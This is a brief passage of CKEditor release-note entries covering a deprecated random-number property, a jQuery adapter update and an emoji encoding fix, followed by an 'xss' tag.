*   #5127: Deprecated the CKEDITOR.rnd property to discourage using it in a security-sensitive context.
*   #5087: Improved the jQuery adapter by replacing a deprecated jQuery API with existing counterparts. Thanks to Fran Boon!
*   #5128: Improved the Emoji definitions encoding set by the config.emoji_emojiListUrl configuration option.

Tag

#xss